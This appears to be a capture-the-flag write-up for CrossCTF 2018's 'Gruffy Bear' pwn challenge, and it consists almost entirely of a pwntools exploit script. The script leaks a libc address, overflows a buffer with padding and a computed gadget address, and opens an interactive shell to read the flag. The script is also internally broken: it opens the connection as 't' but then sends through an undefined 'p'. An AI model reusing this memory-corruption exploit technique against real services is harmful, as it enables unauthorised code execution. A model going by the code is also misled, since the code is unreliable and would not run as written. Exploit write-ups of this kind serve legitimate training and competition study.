CrossCTF_2018: Gruffy Bear

Category: Pwn Points: 476 Description:

There's something fishy about this Build-A-Bear workshop... nc ctf.pwn.sg 4002 Creator - amon (@nn_amon)

Write-up

#! /usr/bin/env python
##
# Imports
from pwn import *

# Build a bear
def build(a,b,c,d):
    t.sendline("1")
    t.recvuntil(":")
    t.sendline(a)
    t.recvuntil(":")
    t.sendline(b)
    t.recvuntil(":")
    t.sendline(c)
    t.recvuntil(":")
    t.sendline(d)
    t.recvuntil("0. Exit")
    t.recvline()

# Create tubing
t = remote("ctf.pwn.sg", 4002)
t.recvuntil("0. Exit\n")

# Build 13 bears
for i in range(0xd):
    build("1","1","1","a"*0x80)

# Attempt to dance
p.sendline("1")
p.sendline("ENTERTAINUS")
p.recvuntil("0. Exit\n")


p.sendline("2")
p.recvuntil(": ")
p.sendline("0")
p.recvuntil("0. Exit")
p.recvline()

p.sendline("4")
p.recvuntil("a"*0x80)
a=p.recv(6)+"\x00\x00"
a=u64(a)
print(hex(a))
p.recvuntil("0. Exit")
p.recvline()

p.sendline("3")
p.recvuntil("0. Exit")
p.recvline()

p.sendline("5")
p.recvuntil(": ")
p.sendline(str(0xb7))
p.recvuntil(": ")
p.sendline("d"*176+p64(a-0x844f0+0xf02a4)[:-1])
p.recvuntil("0. Exit")
p.recvline()
p.sendline("7")

p.clean(3)

p.interactive()

Running our exploit, gives us the ability to get our flag!

$ cat flag
CrossCTF{it_is_almost_midnight_here_in_sf}

Therefore, the flag is CrossCTF{it_is_almost_midnight_here_in_sf}.

results matching ""

    No results matching ""